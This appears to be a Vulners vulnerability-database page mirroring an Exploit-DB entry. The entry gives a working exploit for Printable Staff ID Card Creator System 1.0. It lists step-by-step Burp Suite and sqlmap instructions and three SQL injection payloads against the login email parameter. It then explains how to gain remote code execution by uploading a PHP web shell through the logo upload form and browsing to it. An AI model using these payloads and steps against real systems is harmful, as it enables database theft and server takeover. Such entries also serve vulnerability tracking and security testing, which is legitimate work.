Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection

🗓️ 17 May 2021 00:00:00Reported by bwnzType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 266 Views

Printable Staff ID Card Creator System 1.0 SQL Injection & Remote Code Execution via Arbitrary File Uploa

Code
# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
# Date: 2021-05-16
# Exploit Author : bwnz
# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
# Version: 1.0
# Tested on: Ubuntu 20.04.2 LTS

# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
# vulnerability to obtain remote code execution.


-----SQL Injection-----
Step 1.) Navigate to the login page and populate the email and password fields.
Step 2.) With Burp Suite running, send and capture the request.
Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
Step 4.) Open a terminal and run the following command:
	sqlmap -r <saved item>

Below are the SQLMap results

Parameter: user_email (POST)
   	 Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
----- END -----


----- Authenticated RCE via Arbitrary File Upload -----
# For this attack,  it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.

Step 1.) After logging in, click the "Initialization" option and "Add System Info".
Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.
----- END ------

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 May 2021 00:00Current
7.4High risk
Vulners AI Score7.4
sql injectionremote code executionprintable staff id card creator systemarbitrary file uploadburp suitesqlmapubuntu 20.04.2 lts
266